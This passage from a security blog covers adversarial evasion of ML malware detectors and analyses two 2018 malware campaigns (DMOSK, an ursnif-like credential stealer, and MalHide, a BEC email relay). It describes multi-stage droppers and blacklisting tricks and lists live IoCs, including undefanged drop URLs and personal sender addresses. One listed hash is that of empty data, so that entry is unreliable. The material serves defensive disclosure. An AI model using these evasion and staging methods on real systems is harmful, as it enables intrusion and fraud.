Binary black-box attacks are the most general one since attacker does not know anything about the used model and the anti malware engine just says: True or False (it's a Malware or it is not a Malware). In 2017 W.Hu and Y.Tan made a great work described in "Generating Adversarial Malware Examples for Malware Classification" (here). The authors developed MalGAN an Adversial Malware generator able to generate valid PE Malware to evade static black-box PE malware engine. The idea behind MalGAN is simple. First the attacker maps the Black-Box outputs by providing specific and Known Samples (Malware and Good PE). After the mapping phase the attacker builds a Model that behaves as the black-box Model. It is a simple Model trained to behave as the targeted one. Then the built Model is used as target model in a gradient computation GAN to produce evasive Malware. The authors reported 100% efficacy in bypassing the target Model. H. S. Anderson et Al. in "Evading Machine Learning Malware Detection" (here) adopted a Reinforced Learning Approach. The following image shows the Markov decision process formulation of the malware evasion reinforcement learning problem.

Image from: Evading Machine Learning Malware Detection


The agent is the function who manipulate the sample depending on the environment state. Both the reward and a the state are used as input from the agent in order to get decisions on next actions. The agent learns by the reward which depends about the reached state. For example the reward could be higher if the reached state is close to the desired one or vice-versa. The authors use a Q-Learning technique in order to underestimate a negative reward given for an action which would be significant in medium long term.

"In our framework, the actions space A consists of a set of modifications to the PE file that (a) don’t break the PE file format, and (b) don’t alter the intended functionality of the malware sample. The reward function is measured by the anti-malware engine, which is converted to a reward: 0 if the modified malware sample is judged to be benign, and 1 if it is deemed to be malicious. The reward and state are then fed back into the agent."

Final Considerations

Machine Learning, but more generally speaking Artificial Intelligence, would be useful to detect Cyber Attacks but unfortunately - as widely proved on this post - it would not be enough per se. Attackers would use the same techniques such as Adversarial Machine learning  to evade Machine Learning detectors. Cyber Security Analysts would still play a fundamental role in Cyber Security Science and Technology for many years from now. A technology who promises to assure cyber security protection without human interaction is not going to work.



Friday, June 8, 2018

DMOSK Malware Targeting Italian Companies

Today I'd like to share another interesting analysis made by my colleagues and I. It would be a nice and interesting analysis since it targeted many Italian and European companies. Fortunately the attacker forgot the LOG.TXT freely available on the dropping URL letting us know the IP addresses who clicked on the first stage analysed stage (yes, we know the companies who might be infected) . Despite what we did with TaxOlolo we will not disclose the victims IP addresses and so the companies which might be infected. National CERTs have been involved and they've got alerted.  Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick'n dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.

Everything started from an eMail (how about that ?!). The eMail we've got had the following body.

Attack Path
A simple link to a drive ( drive.carlsongracieanaheim.com ) is beginning our first stage of infection. An eMail address is given as one parameter to the doc.php script which would record the IP address and the "calling" email  address belonging to the victim. The script forces the browser to download a .zip file which uncompressed presents to the victim a JSE file called: scan.jse.  The file is hard obfuscated. It was quite difficult to be able to decode the following stage of infection since the JavaScript was obfuscated through, at least, 3 different techniques. The following image shows the Obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed once de-obfuscated it we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it's interesting to observe that only one dropping URL was called. It's a strange behaviour, usually the attackers use multiple dropping URLs in order to get more chances to infect the victims. The found URL was the following one:

"url": "https://drive.carlsongracieanaheim.com/x/gate.php"

The JSE file dropped the Third Stage into \User\User\AppData\Local\Temp\38781520.scr having the following  hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 which has been previously analysed by 68 AV but only 9 of them recognised as malicious generic file. The following image shows the VirusTotal analysis.



Third Stage: Executable SCR file


Unfortunately we are still not at the end of the infection Stage. The Third stage drops and executes another payload. It does not download and execute from a different dropping website but it drops from a special and crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the Fourth Stage payload directly from the victim's memory

Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to ursnif which grabs victims email information and credentials. The following image shows the temporary file built before sending out information to Command and Controls servers.

Temporary File Before Sending data to Command and Control

Like any other ursnif the malware tries to reach a command and control network located both on the clearnet and on the TOR network. A following section will expose the recorded IoCs.

An interesting approach that was adopted by attackers is the black listing. We observed at least 3 black lists. The first one was based on victims IP. We guess (but we have not evidences on that) that the attacker would filtering responses based on Country in order to make possible a country targeted attack by blacklisting not-targeted countries. The following image shows the used temporary file to store Victim IP. The attacker could use this information in order to respond or not to a specific malware request.

Temporary File Storing IP Victim IP Address

A second black list that we found was on the dropping URL web site which was trained to do not drop files to specific IP addresses. The main reasons found to deny the dropping payload were three:
  • geo (Out of geographical scope). The threat is mainly focused to hit italy.
  • asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would have no sense to give payload to cloud providers.
  • MIT. THe attacker does not want the dropping payload ends up to MIT folks, this is quite funny, isn't it ?
A small section of black listing drop payload  



The black lists are an interesting approach to reduce the chance to be analysed, in fact the black listed IPs belong to pretty known CyberSecurity Companies (Yoroi is included) which often use specific cloud providers to run emulations and/or sandboxes. 

Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a blocking delivery of payload technique. End personal note.

Now we know how the attack works, so lets try to investigate a little bit what the attacker messed out. For example lets try to analyse the content of the Dropping URL. Quite fun to figure out the attacker let freely available his private key ! I will not disclose it .... let's say... for respect to the attacker (? really ?) 

Attacker Private Key !

While the used public certificate is the following one:

Attacker Certificate

By decoding the fake certificate the analyst would take the following information, of course none of these informations would be valuable, but make a nice shake of analysis .

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16

Maybe the most "original string", by meaning of being written without thinking too much from the attacker, on the entire malware analysis would be the string  "dmosk" (in the decoded certificate), from here the Malware name.

As today we observed: 6617 eMail addresses that potentially could be compromised since they clicked on First stage (evidences on dropping url). We have evidences that many organisations have been hit from this malware able to bypass most of the known security protections since it was behind CloudFlare and with not a specific bad reputation. We decided to not disclose the "probably infected" companies. Nation Wide CERTs have been alerted (June 7 2018) and together we will contact the "probably infected" companies to help them to mitigate the threat. 

Please update your rules, signature and whatever you have to block the infection.

PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi stage obfuscators and a complete list of "probably infected" users, but again, we decided to encourage the notification speed rather than analysis details. 

Hope you might find it helpful.


IoC:
  • Dropurl:
    • https:// drive[.carlsongracieanaheim[.com/doc.php
    • https:// drive[.carlsongracieanaheim[.com/doc1.php
    • https:// drive[.carlsongracieanaheim[.com/x/gate.php
    • https:// drive[.carlsongracieanaheim[.com/1/gate.php
  • C2 (tor):
    • https:// 4fsq3wnmms6xqybt[.onion/wpapi
    • https:// em2eddryi6ptkcnh[.onion/wpapi
    • https:// nap7zb4gtnzwmxsv[.onion/wpapi
    • https:// t7yz3cihrrzalznq[.onion/wpapi
  • C2:
    • https:// loop.evama.[at/wpapi
    • https:// torafy[.cn/wpapi
    • https:// u55.evama[.at/wpapi
    • https:// yraco[.cn/wpapi
    • https:// inc.robatop.[at/wpapi
    • https:// poi.robatop.[at/wpapi
    • https:// arh.mobipot.[at/wpapi
    • https:// bbb.mobipot.[at/wpapi
    • https:// takhak.[at/wpapi
    • https:// kerions.[at/wpapi
    • https:// j11.evama[.at/wpapi
    • https:// clocktop[.at/wpapi
    • https:// harent.[cn/wpapi
  • Hash:
    • 067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
    • 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
    • 8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
    • 1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
    • afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe
  • Cert:
-----BEGIN CERTIFICATE-----
MIID3zCCAsegAwIBAgIJAK4RHChf5QoWMA0GCSqGSIb3DQEBCwUAMIGFMQswCQYD
VQQGEwJSVTEMMAoGA1UECAwDU1BiMQwwCgYDVQQHDANTUGIxGDAWBgNVBAoMD0ds
b2JhbCBTZWN1cml0eTEWMBQGA1UECwwNSVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQ
dGVzdC5kbW9zay5sb2NhbDENMAsGA1UEAwwEdGVzdDAeFw0xODA2MDUxNTIyMjBa
Fw0yMjA2MDUxNTIyMjBaMIGFMQswCQYDVQQGEwJSVTEMMAoGA1UECAwDU1BiMQww
CgYDVQQHDANTUGIxGDAWBgNVBAoMD0dsb2JhbCBTZWN1cml0eTEWMBQGA1UECwwN
SVQgRGVwYXJ0bWVudDEZMBcGA1UEAwwQdGVzdC5kbW9zay5sb2NhbDENMAsGA1UE
AwwEdGVzdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMua+rsContr
RIvQHX/M2qE4H30dIaLpYUqKll3GaZl8nkSxDAtyytfkMxiMeyn6tg2wy1M8RgGN
7dqtQwUJHfRdiaebmliKMPJHBn3SOhTd/caf7v552C85AQuOKZMWgaJ/3gQodmgI
Tr7p8q7g2OWg4nE0nGXXasFZYVEU3S81Z0wxNriRD9geNfkamv8fi0hm8HzDnLdi
bjvbTAsqTdegkkk/41ssXttckQRhRpgIzqRJ+sappdu4FzTuxOVA4jSRgZokD1l2
QFr4YTEJSUz4QHDGbow3nLvqTEHpvG90tgr+AHcR31otPiI1wm6bTj6IdicFENfC
4+5aIkvm72cCAwEAAaNQME4wHQYDVR0OBBYEFBIc9X32dzRzR9T1pmrmdZtshmJ9
MB8GA1UdIwQYMBaAFBIc9X32dzRzR9T1pmrmdZtshmJ9MAwGA1UdEwQFMAMBAf8w
DQYJKoZIhvcNAQELBQADggEBAE8AE11sWLICXcBO64iYByM96ZSWWN1JYGRaFWJ8
l8J1BiQNxh5N31X1HBs/sc87CPuqBB8CKxukoYU1T54HZQYmb3NHdc3JLFH2ah/o
028TSCXy16uvGGcxMhNcoZUCjWQHJzbXbVvPjkKjkJ1RR8DV1hRMcYLfO6LtSjAd
h7VnPVBNffGC/n9eTQjvwOR+dRN1IFLzwmpnwqVcxxjJM3+2OExfWBzKQ08/7MK/
xM8X8cmAb11Oyg7RXnE7X9Cfygy/Rz2fDGv4K7N8YDdL5osnyrN5fG8L2GG+srJ2
wdFYILlV+eLyfhwr6Oor5Z4zPgvcLLKbpHxQBvdkEdqX5F0= 
-----END CERTIFICATE-----

Sunday, May 27, 2018

MalHide: an interesting Malware sample

Today I'd like to share an interesting (at least to me) analysis on a given sample. I have called this sample MalHide but you will see "why" only at the end of my post :D. I believe this is a quite interesting Malware since it firstly implements several obfuscation stages by using different obfuscation techniques and secondly it implements a quite new attack path (not new per-se but new on opportunistic malware families) where the attacker doesn't want to steal informations and/or compromise a system for possession and/or destruction but the attacker uses the compromised system as eMail relay in order to hide the attacker networks. It is amazing to figure out that attackers are primary moving on fraud direction. For example, having a successful privilege access on the victim machine, the attacker might decide to performa several malicious actions, but among all the choices, he decides to spawn a SMTP relay to send anonymously fraud emails. Based on my past experience this is quite wired, isn't it ?!

Disclaimer: I'm not going into details on every steps since I'am not writing a tutorial but mostly I'd like to prove that threats are getting more and more complex on relative short time and that attack path is quite unique at least for my personal experience.

Everything started from an eMail attachment. "Nuovo Documento.doc" is its name and it is able to bypass every single AntiSpam and AntiMalware engine the target had. The following image shows the initial stage where the ".DOC" file seems to be benign but not compatible with the running Microsoft Word instance.

Sample as it looks like on opening. Stage 1

The sample presents some macro functions on it. Many junk functions have been injected on the VBA side in order to make life harder to reverse engineers, bu fortunately the great Microsoft VBA Editor included in the Microsoft Office suite implements an useful debugger. The analyst observes that the AutoOpen() function is preserved and filled by code. It took almost 3 seconds to figure out it was a malicious code. The following image shows the Microsoft VBA Editor debugging view where  is possible to appreciate the variable qZbTUw containing a PwerShell encoded code. Here we are ! The second stage is approaching to the victim.

Stage 2. A running instance of PowerShell invoked by VBA

The PowerShell code was Base64 Encoded and additionally obfuscated through "variable mess". This technique is quite common for  javascript devs since the code they develop runs on client side and obfuscating code is used technique to protect (sort of) the written code, but on the given scenario it looks like a simple implementation of FileLess Staging, where the attacker runs a powershell script directly from memory without saving it on HD, in such a way the victim does not need to enable the "running powershell from file" Microsoft register key and it's much harder from AntiVirus detect the infection stage. Then the script  fires it on following the infection. Powershell ISE helps us to reverse the dropped payload. The following images show the decoding process: from the single line of obfuscated code to dropping URLs. I know, it's almost impossible to see the images since they looks like small, but please click on them to make a bigger view,  if you wish.

Stage 3. Decoding Powershell Drop-and-Execute


Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to IoC section) ! The executed actions are quite standard. From an array of dropping website lets cycle over them and take the one who drops ! The cycling policy could differ from sample to sample since they could use a pseudo-random seed generator or adopting an increment rotation or a round robin rotation and son. For this analysis is not interesting cycling policy at all since we decoded all the possible dropping files. The Powershell command gets the 52887.exe from external source (dropping websites) and places it on C:\Users\Public\52887.exe. Finally it runs it. The Stage 4 is began, a new PE sample has been executed. The following image shows the Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately this stage drops the code from itself without getting on network side. The fonduewwa.exe is then executed.

Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe

The new stage (Stage 4) performs the following steps:

1) It fires up services which acts as SMTP client.
2) Connects to a Command and Control which provides emails addresses, SMTP relays, and eMails body to be sent.
3) Sends eMail to exploit BeC communications.

The following images show the Command and Control address. The first image shows the used Windows API while the second one addresses the opened connections directly on the infected machine.

Command and Control IP Address (click to make it bigger)

Command and Control DNS resolution (click to make it bigger)


The Command and Control (c2) listens to: c-67-176-238-209.hsd1.il.comcast.net which today resolves in: 67.176.238.209. The C2 seems to answers to http queries having a specific set of cookies as the following image shows. The C2 crafted and rebuilt communication, made possible by reconstructing cookies from sniffed internal communications, gets back from C2 a kB of encoded data.

Command and Control Communication through HTTP

From C2 comes actions, victims addresses, SMTP servers and passwords. The sample connects to a given SMTP relays, it authenticate itself and sends email to the victims. The following images proves that the attackers have plenty credentials to SMTP relays around the globe.

Connection to real SMTP releys

As now I will not disclose Username e Password for getting access to SMTP relays, but if you can prove to be the owner (or at least to be working for the company owning) of one of them let's have a chat on that, many interesting things are happening into your network. The emails sent from the analysed sample are targeting specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like a BeC (or CEO Scam) to specific targets. For those of you not familiar with this attack I am copying the definition provided by SANS (here).
"Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization’s website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization’s structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT.Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very  small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization’s logo or even the official signature of an executive. These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone."

Following few examples of the sent emails coming from C2 and delivering through the analysed sample.


Here we are, another email has been sent, another Malware have been thought and developed, another analysis I've been made but this time it looks like the "Malware economy" is seriously moving to fraud, there is much money respect to information stealing which is an ancient and romantic way to attack victims. Is this attack a significative example expressing the will of the new underground economy ? Is this attack a small and silent change of paradigm, where previously the attacker was interested to your data in order to sell them but now he gets more interested on fraud third parties (such as companies) through you ? I do not have such answer here.

Ok, now it's time to explain why I called this Malware MalHide. Well it's a complex Malware, it hides itself several times BUT most important it has been developed to hide the attacker from sending emails in a way that is not possible to trace back the Attacker IP from the attack path. So I believe MalHide would be a nice name :D

IoCs:

Samples:

  • 2f1f03b4afde643b2ed798e62f4718b0a285b8a8
  • e6b1a4b09613f1729782f1b2c04a30ad5ff30200
  • da39a3ee5e6b4b0d3255bfef95601890afd80709
Dropping URLs:
  • http://oddbods.co.uk/D6yd9x/
  • http://136.243.206.64
  • http://166.63.0.27
  •  http://136.243.206.64
  • http://promoclass.it/ACCOUNT/Invoice-161021407-Invoice-date-052518-Order-no=-06146166318/
Local Path:
  • C:\Windows\SysWOW64\fonduewwa.exe
  • C:\Users\Public\52887.exe
C2:
  • 67.176.238.209
  • c-67-176-238-209.hsd1.il.comcast.net
SMTP (contacted to send eMails, those are not malicious per-se !):
  • 186.1.11.125 (smtp.echamorro.com.ni)
  • 192.243.105.21 (mail.mcmillins.com)
  • 209.91.128.17 (mail.maslack.com)
  • 64.8.70.103 (mail.tds.net)
  • 208.80.38.254 (pop.spiderhost.com)
  • 193.252.22.84 (smtp.orange.fr)
  • 199.103.57.167 (mail.mytravelclinic.com)
  • 149.115.16.7 (mail.transamericanengineers.com)
  • 68.99.120.8 (mail.coxmail.com)
  • 74.125.71.108 (smtp.gmail.com)
  • 76.12.209.196 (mail.gachivvis.com)
  • 107.14.166.78 (pop.biz.rr.com)
  • 64.39.128.67 (mail.syrupcity.net)
  • 107.180.3.218 (mail.rutledge-associates.com)
  • 165.212.120.200 (exchange.postoffice.net)
  • 64.35.208.130 (smtp.atcnet.net)
  • 207.204.50.27 (mail.cabstore.biz)
  • 216.52.72.118 (smtp.zoho.com)
  • 209.237.135.167 (mail.astarabatement.com)
  • 107.14.166.72 (smtp.twcny.rr.com)
  • 74.208.5.2 (smtp.1and1.com)
  • 209.123.49.115 (ssl.datamotion.com)
  • 208.92.193.92 (mail.hdap.ca)
  • 68.178.213.37 (smtp.secureserver.net)
  • 72.167.238.29 (smtp.secureserver.net)
  • 66.226.70.67 (pop.doubleolaser.com)
  • 205.178.146.249 (mail.boersmatravel.com)
  • 173.201.192.229 (smtpout.secureserver.net)
  • 64.59.128.135 (mail.shaw.ca)
  • 69.156.240.33 (mail.bestelectric.ca)
  • 38.123.104.66 (smtp.263.net)
  • 184.106.54.11 (smtp.emailsrvr.com)
  • 184.106.54.10 (secure.emailsrvr.com)
  • 209.237.135.166 (webmail5.myregisteredsite.com)
  • 74.125.133.16 (pop.googlemail.com)
  • 68.178.252.229 (smtpout.secureserver.net)
  • 64.20.48.173 (mail.expertforccna.com)
  • 72.47.216.15 (smtp.newalbanyelitedental.com)
  • 66.102.1.109 (pop.gmail.com)
  • 205.207.122.80 (mail.connection.ca)
  • 182.50.145.3 (smtpout.asia.secureserver.net)
  • 74.125.133.109 (imap.gmail.com)
  • 74.6.141.48 (smtp.att.yahoo.com)
  • 193.252.22.86 (smtp.orange.fr)
  • 68.178.252.101 (smtpout.secureserver.net)
  • 69.4.62.69 (pop.kerrcad.org)
  • 69.168.106.36 (smtp.windstream.net)
  • 188.125.73.26 (smtp.mail.yahoo.com)
  • 65.254.254.53 (mail.fatcow.com)
  • 65.254.254.52 (mail.fatcow.com)
  • 69.49.123.241 (mail.salzburginteriors.com)
  • 207.29.219.108 (mail.bayou.com)
  • 198.57.169.26 (bst-hosting.com)
  • 207.223.121.25 (mail.cloudopscenter.com)
  • 207.204.50.18 (mail.reliusmed.com)
  • 208.180.150.85 (mail.lrgriffin.com)
  • 217.15.86.61 (mail.roche-bobois.com)
  • 204.8.72.128 (mail.gdins.org)
  • 66.96.160.206 (pop.seriousfunnyc.org)
  • 66.175.58.40 (mail.mhpwq.org)
  • 207.204.50.11 (mail.prestonequipment.com)
  • 208.89.138.22 (m.ivenue.com)
  • 205.178.146.235 (mail.holstongases.com)
  • 68.15.34.125 (mail.jancompanies.com)
  • 212.82.101.35 (smtp.verizon.net)
  • 192.185.4.163 (gator4151.hostgator.com)
  • 137.118.58.15 (pop.totelcsi.com)
  • 207.69.189.23 (smtp.ix.netcom.com)
  • 68.87.20.6 (smtp.comcast.net)
  • 65.254.250.110 (smtp.franklintonnc.us)
  • 66.118.64.100 (smtp.citynet.net)
  • 173.203.187.10 (pop.emailsrvr.com)
  • 173.15.144.57 (mail.pembertonpolice.com)
  • 173.203.187.14 (mail.sbctransportation.com)
  • 72.52.250.187 (www11.qth.com)
  • 68.178.213.203 (smtp.secureserver.net)
  • 64.78.61.107 (mail16.intermedia.net)
  • 165.212.11.125 (smtp.postoffice.net)
  • 72.35.23.61 (pop.callta.com)
  • 206.188.198.65 (mail.bayoubendtx.com)
  • 65.254.250.100 (pop.powweb.com)
  • 64.29.151.235 (mail.arizoncompanies.com)
Used eMails (sender):
  • helene.valeze@wanadoo.fr
  • mehdi.audam@wanadoo.fr
  • dominique.derbord@wanadoo.fr